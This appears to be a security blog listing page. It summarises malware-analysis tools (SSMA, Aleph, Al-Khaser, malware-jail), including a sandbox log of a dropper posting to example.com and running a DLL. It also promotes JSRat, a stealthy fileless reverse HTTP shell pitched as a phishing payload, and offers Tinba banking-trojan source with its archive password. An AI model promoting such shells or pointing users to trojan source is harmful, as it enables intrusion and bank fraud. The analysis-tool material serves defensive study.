Simple Static Malware Analyzer - SSMA

SSMA is a simple malware analyzer written in Python 3.

Features:

• Searches for websites, e-mail addresses, IP addresses in the strings of the file.
  
• Looks for Windows functions commonly used by malware.
  
• Get results from VirusTotal and/or upload files.
  
• Malware detection based on Yara-rules - https://virustotal.github.io/yara/
  
• Detect well-known software packers.
  
• Detect the existence of cryptographic algorithms.
  
• Detect anti-debug and anti-virtualization techniques used by malware to evade automated analysis.
  
• Find if documents have been crafted to leverage malicious code.
  

Usage

git clone https://github.com/secrary/SSMA

cd SSMA

sudo pip3 install -r requirements.txt

python3 ssma.py -h

Additional: ssdeep - Installation
More: Simple Static Malware Analyzer

Download SSMA

Read More

OpenSource /Malware Analysis Pipeline System - Aleph

What?

Aleph is designed to pipeline the analysis of malware samples. It has a series of collectors that will gather samples from many sources and shove them into the pipeline. The sample manager has a series of plugins that are ran against the sample and returns found data into JSON form.

These JSON data can be further processed and queried in a objective manner instead of grepping and regexing.

How?

The main Aleph daemon is a loose-coupled python application and library. These are composed by the Aleph Service that spawns:

1.The Collectors. These are responsible for going to multiple sources (Filesystem folder, IMAP folder, FTP directory etc) and collect all the files there, store locally and add them to the processing queue. Each collector runs in its own process (fork).

2.Multiple (quantity is configurable) parallel SampleManager services (that will pull samples from the work queue and process them) and run the plugins that receives the sample path and return the JSON object of found artifacts.

3.The sample object is converted to JSON along with its data and is stored into an Elasticsearch backend.

Installing Aleph

Requirements

In order to get a clean and nice install, you should download some requirements: Ubuntu/Debian

apt-get install python-pyrex libffi-dev libfuzzy-dev python-dateutil libsqlite3-dev

ElasticSearch

First if you don't have an Elasticsearch instance ready, you must install one.
For Debian/Ubuntu/Redhat/Fedora/CentOS (yum + apt basically) users, follow this guide.
** Remember: Elasticsearh uses JVM, so you also must install it =) **

Python modules

We strongly suggest that you use python's virtual environment so you don't pollute the rest of your OS installation with python modules. To make a contained virtual environment, install virtualenv with pip:

pip install virtualenv

Go to the desired Aleph installation folder and type the following to create and activate your virtual environment:

virtualenv venv # 'venv' can be any name

source venv/bin/activate

There will be the environment name (venv) appended to your PS1 variable:

(venv)(2014-08-19 17:36:%)(~/opt/aleph/)

All python modules required are listed on the requirements.txt file on the root repository folder. You can install all of them at once using pip:

pip install -r requirements.txt

Then clone the repository and copy the settings file:

git clone https://github.com/merces/aleph.git --branch aleph-python --single-branch .

cp aleph/settings.py.orig aleph/settings.py

Edit settings.py and add a local source (a folder where Aleph will search for samples - WARNING: ALEPH WILL MOVE THE SAMPLE THUS REMOVING FROM THE ORIGINAL FOLDER) The folder must exists as Aleph won't try to create them

SAMPLE_SOURCES = [

    ('local', {'path': '/opt/aleph/unprocessed_samples'}),

]

Review your Elasticsearch installation URI

ELASTICSEARCH_URI = '127.0.0.1:9200'

** Workaround step ** As I still finish some of the code, there are some folders that are not on the repository and must be created manually and set accordingly on the settings.py file:

SAMPLE_TEMP_DIR = '/opt/aleph/temp'

SAMPLE_STORAGE_DIR = '/opt/aleph/samples'

Remember to verify folders permissioning. And Aleph is ready to run!

Running

Go to Aleph folder, activate the virtual environment and run the bin/aleph-server.py as following:

cd /opt/aleph/

source venv/bin/activate

./bin/aleph-server.py

And that's it. Check your logs under log/aleph.log to any troubleshooting.

Install the Web interface(Webui)

Edit the "SERVER_NAME" constant at your settings.py file. ex: SERVER_NAME = 'mydomain.com:90'
then create the following entry:

SECRET_KEY = 'Pu7s0m3cryp7l337here' #do not use this ;)

SAMPLE_SUBMIT_FOLDER= '/some/path' #where samples will be submitted from webui

Setup your database:

python bin/db_create.py

Run the webui script:

bin/aleph-webui.sh

To access your webinterface open your favorite browser at http://SERVER_NAME #That value you changed before.

Login: admin

Password: changeme12!

Note: For sake of Security's God, CHANGE YOUR PASSWORD! ;)

But if you do not like our webinterface you still can use other softwares to review and query data on elasticsearch. I strongly suggest this Chrome REST client plugin or the great Kibana

Currently implemented

Collectors

ºFileCollector: grabs samples from a local directory
ºMailCollector: grabs samples from email attachments on a IMAP folder

Plugins

ºPEInfo : extracts info from PE files such as entrypoint, number of sections and some PE characteristics(SEH/ASLR/DEP).
ºZipArchivePlugin: extracts zip files and puts their contents back into analysis queue.
ºStringsPlugin: extracts strings from sample into three categories: All Strings, URI Strings and Filename Strings (not 100% but we do our best).
ºVirustotalPlugin: check a sample SHA256 hash against Virustotal database and get the report. If that hash doesnt exist, send the file to analise.
ºTrID: check the filetype of a sample.

Download Aleph

Read More

Reverse HTTP Shell Using JavaScript - JSRat

JSRat is a reverse HTTP Shell by using JavaScript. JSRat use rundll32.exe to load the JavaScript code in cmd and a HTTP Shell is returned when the code is executed. The special part is that after running the cmd command, rundll32.exe will remain in the background to continuously connect to the Server. No file is written to the disk during the whole process, which significantly enhances stealth.

Characteristics:

To reverse a shell by using cmd to execute codes

Advantages:

• It can avoid being killed
• It’s easy to use
• It’s relatively stealthy.

Exploitation:

Based its characteristics and advantages, using JavaScript as the phishing payload can achieve amazing effect.

Download JSRat

Read More

Public Malware Techniques Used In The Wild - Al-Khaser

al-khaser is a PoC malware with good intentions that aimes to stress your anti-malware system. It performs a bunch of nowadays malwares tricks and the goal is to see if you catch them all.

Possible uses

• You are making an anti-debug plugin and you want to check its effectiveness.
• You want to ensure that your sandbox solution is hidden enough.
• Or you want to ensure that your malware analysis environement is well hidden.

Please, if you encounter any of the anti-analysis tricks which you have seen in a malware, don't hesitate to contribute.

Features

Anti-debugging attacks

• IsDebuggerPresent
• CheckRemoteDebuggerPresent
• Process Environement Block (BeingDebugged)
• Process Environement Block (NtGlobalFlag)
• ProcessHeap (Flags)
• ProcessHeap (ForceFlags)
• NtQueryInformationProcess (ProcessDebugPort)
• NtQueryInformationProcess (ProcessDebugFlags)
• NtQueryInformationProcess (ProcessDebugObject)
• NtSetInformationThread (HideThreadFromDebugger)
• NtQueryObject (ObjectTypeInformation)
• NtQueryObject (ObjectAllTypesInformation)
• CloseHanlde (NtClose) Invalide Handle
• UnhandledExceptionFilter
• OutputDebugString (GetLastError())
• Hardware Breakpoints (SEH / GetThreadContext)
• Software Breakpoints (INT3 / 0xCC)
• Memory Breakpoints (PAGE_GUARD)
• Interrupt 0x2d
• Interrupt 1
• Parent Process (Explorer.exe)
• SeDebugPrivilege (Csrss.exe)
• NtYieldExecution / SwitchToThread

Anti-virtualization

• Virtualbox registry key values artifacts:
  • "HARDWARE\DEVICEMAP\Scsi\Scsi Port 0\Scsi Bus 0\Target Id 0\Logical Unit Id 0 (Identifier)
  • HARDWARE\Description\System (SystemBiosVersion)
  • HARDWARE\Description\System (VideoBiosVersion)
  • HARDWARE\Description\System (SystemBiosDate)
• Virtualbox registry Keys artifacts
  • "HARDWARE\ACPI\RSDT\VBOX__"
  • "HARDWARE\ACPI\FADT\VBOX__"
  • "HARDWARE\ACPI\RSDT\VBOX__"
  • "SOFTWARE\Oracle\VirtualBox Guest Additions"
  • "SYSTEM\ControlSet001\Services\VBoxGuest"
  • "SYSTEM\ControlSet001\Services\VBoxMouse"
  • "SYSTEM\ControlSet001\Services\VBoxService"
  • "SYSTEM\ControlSet001\Services\VBoxSF"
  • "SYSTEM\ControlSet001\Services\VBoxVideo"
• Virtualbox file system artifacts:
  • "system32\drivers\VBoxMouse.sys"
  • "system32\drivers\VBoxGuest.sys"
  • "system32\drivers\VBoxSF.sys"
  • "system32\drivers\VBoxVideo.sys"
  • "system32\vboxdisp.dll"
  • "system32\vboxhook.dll"
  • "system32\vboxmrxnp.dll"
  • "system32\vboxogl.dll"
  • "system32\vboxoglarrayspu.dll"
  • "system32\vboxoglcrutil.dll"
  • "system32\vboxoglerrorspu.dll"
  • "system32\vboxoglfeedbackspu.dll"
  • "system32\vboxoglpackspu.dll"
  • "system32\vboxoglpassthroughspu.dll"
  • "system32\vboxservice.exe"
  • "system32\vboxtray.exe"
  • "system32\VBoxControl.exe"
• Virtualbox directories artifacts:
  • "oracle\virtualbox guest additions\"
• Virtualbox MAC Address:
  • "\x08\x00\x27"
• Virtualbox virtual devices:
  • "\\.\VBoxMiniRdrDN"
  • "\\.\VBoxGuest"
  • "\\.\pipe\VBoxMiniRdDN"
  • "\\.\VBoxTrayIPC"
  • "\\.\pipe\VBoxTrayIPC")
• Virtualbox Windows Class
  • VBoxTrayToolWndClass
  • VBoxTrayToolWnd
• Virtualbox network share
  • VirtualBox Shared Folders
• Virtualbox process list
  • vboxservice.exe
  • vboxtray.exe

Anti Dumping

• Erase PE header from memory

Code/DLL Injections techniques

• CreateRemoteThread
• SetWindowsHooksEx
• NtCreateThreadEx
• RtlCreateUserThread
• APC (QueueUserAPC / NtQueueApcThread)
• RunPE (GetThreadContext / SetThreadContext)

Timing Attacks

• Sleep -> SleepEx -> NtDelayExecution
• SetTimer (Standard Windows Timers)
• timeSetEvent (Multimedia Timers)

Download Al-Khaser

Read More

Tiny banker aka Tinba Source - Trojan Banker

Obs. I am not responsible for their actions, test in the virtual machine for not damage your real system.


Tinba got its name from its extraordinarily small size – its code is approximately 20 kilobytes in size, a remarkably small number for banking malware. Tinba is a combination of the words tiny and banker; the same malware is also known as Tinybanker and Zusy.

The program  encrypted with pass code and key file to security

Pass: offensivesec

Download Tiny Banker

Read More

Sandbox for semi-automatic Javascript malware analysis and payload extraction - Malware-Jail

Sandbox for semi-automatic Javascript malware analysis and payload extraction. Written for Node.js

malware-jail is written for Node's 'vm' sandbox . Currently implements WScript (Windows Scripting Host) context env/wscript.js , at least the part frequently used by malware. Internet browser context is partialy implemented env/browser.js .

Runs on any operating system, tested on Linux (Node v4.2.1).

Prerequisites

You'll need Node.js and npm .
malware-jail requires minimist , and xmlhttprequest and entities npm packages, you may install them with:

npm install

or

npm install minimist xmlhttprequest entities

Warning
Be careful when working with a real malware. A malware, which is aware of this sandbox, may try to escape and harm your PC. It's recommended you run it either from an unpriviledged Linux account or from within virtualized Windows machine. Angler files in the malware folder are NOT disarmed.

Usage

bash@linux# node jailme.js -h
11 Jan 00:07:39 - Malware sandbox ver. 0.2
11 Jan 00:07:39 - ------------------------
11 Jan 00:07:39 - Usage: node jailme.js  [[-e file1] [-e file2] .. ] [-o ofile] [-s odir] [--down=y] [malware1 [malware2] .. ]
11 Jan 00:07:39 -       -e ifile ... js that simulates specific environment
11 Jan 00:07:39 -       -o ofile ... name of the file where sandbox shall be dumped at the end
11 Jan 00:07:39 -       -s odir  ... output directory for generated files (malware payload)
11 Jan 00:07:39 -       --down=y ... use http request to download malware components automatically
11 Jan 00:07:39 -       malware  ... js with the malware code
11 Jan 00:07:39 - If no arguments are specified the default values are taken from config.json

In the examples folder you may find a deactivated malware file. Run the analysis with:

node jailme.js malware/example.js

or just simply:

node jailme.js

Internet browser based malware you may test with

node jailme.js malware/example_browser.js

The malware/example.js is the default malware file configured in config.json.
After analysis the complete sandbox context is dumped to a file 'sandbox_dump_after.json'. There you may find:

• _eval_calls - array of all eval() calls arguments. Useful if eval() is used for deobfucation.
• _wscript_saved_files - content of all files that the malware attempted to drop. The actual files are saved to the output/ directory too.
• _wscript_urls - all URLs that the malware intended to GET or POST.
• _wscript_objects - WScript or ActiveX objects created.

_'sandbox_dump_after.json' uses JSONPath , implemented by JSON-js/cycle.js , to save duplicated or cyclic references to a same object.

Sample output

bash@linux# node jailme.js malware/example.js
11 Jan 00:06:24 - Malware sandbox ver. 0.2
11 Jan 00:06:24 - ------------------------
11 Jan 00:06:24 - Sandbox environment sequence: env/eval.js,env/wscript.js
11 Jan 00:06:24 - Malware files: malware/example.js
11 Jan 00:06:24 - Output file for sandbox dump: sandbox_dump_after.json
11 Jan 00:06:24 - Output directory for generated files: output/
11 Jan 00:06:24 - ==> Preparing Sandbox environment.
11 Jan 00:06:24 -  => Executing: env/eval.js
11 Jan 00:06:24 - Preparing sandbox to intercept eval() calls.
11 Jan 00:06:24 -  => Executing: env/wscript.js
11 Jan 00:06:24 - Preparing sandbox to emulate WScript environment.
11 Jan 00:06:24 - ==> Executing malware file(s).
11 Jan 00:06:24 -  => Executing: malware/example.js
11 Jan 00:06:24 - ActiveXObject(WScript.Shell)
11 Jan 00:06:24 - Created: WScript.Shell[1]
11 Jan 00:06:24 - WScript.Shell[1].ExpandEnvironmentStrings(%TEMP%)
11 Jan 00:06:24 - ActiveXObject(MSXML2.XMLHTTP)
11 Jan 00:06:24 - Created: MSXML2.XMLHTTP[2]
11 Jan 00:06:24 - MSXML2.XMLHTTP[2].open(POST,http://EXAMPLE.COM/redir.php,false)
11 Jan 00:06:24 - MSXML2.XMLHTTP[2].setRequestHeader(Content-Type, application/x-www-form-urlencoded)
11 Jan 00:06:24 - MSXML2.XMLHTTP[2].send(iTlOlnxhMXnM=0.588860877091065&jndj=IT0601)
11 Jan 00:06:24 - MSXML2.XMLHTTP[2] Not sending data, if you want to interract with remote server, set --down=y
11 Jan 00:06:24 - MSXML2.XMLHTTP[2] Calling onreadystatechange() with dummy data
11 Jan 00:06:24 - ActiveXObject(ADODB.Stream)
11 Jan 00:06:24 - Created: ADODB_Stream[3]
11 Jan 00:06:24 - ADODB_Stream[3].Open()
11 Jan 00:06:24 - ADODB_Stream[3].Write(str) - 10001 bytes
11 Jan 00:06:24 - ADODB_Stream[3].SaveToFile(%TEMP%\57020551.dll, 2)
11 Jan 00:06:24 - WScript.Shell[1].Exec(rundll32 %TEMP%\57020551.dll, DllRegisterServer)
11 Jan 00:06:24 - ADODB_Stream[3].Close()
11 Jan 00:08:42 - ==> Script execution finished, dumping sandbox environment to a file.
11 Jan 00:08:42 - Saving: output/_TEMP__49629482.dll
11 Jan 00:08:42 - Saving: output/_TEMP__38611354.pdf
11 Jan 00:08:42 - Generated file saved
11 Jan 00:08:42 - Generated file saved
11 Jan 00:08:42 - The sandbox context has been  saved to: sandbox_dump_after.json

In the above example the payload has been extracted into output/_TEMP__49629482.dll and output/_TEMP__38611354.pdf

Example: Analysing Angler EK

Download and extract Angler EK from a pcap file at ANGLER EK SENDS CRYPTOWALL into a malware/angler_full.html .
Strip the non Angler part and save as malware/angler_stripped.html .
Remove <script> tags and convert required <div> tags into:

document._addElementById(id, content);

and save as malware/angler.js .
Run the analysis:

node jailme.js malware/angler.js

Eventually capture the output:

node jailme.js malware/angler.js > angler_log.txt

Download  Malware-Jail

Read More

Directory with various materials for studies hacking

Obs, I am not responsible by your act with hacking materials, the materials is responsibility the student 

Directory with various materials for studies hacking, reverse engineering, malware, PenTest tools etc.

By OffensiveSec

Access Ebooks

Read More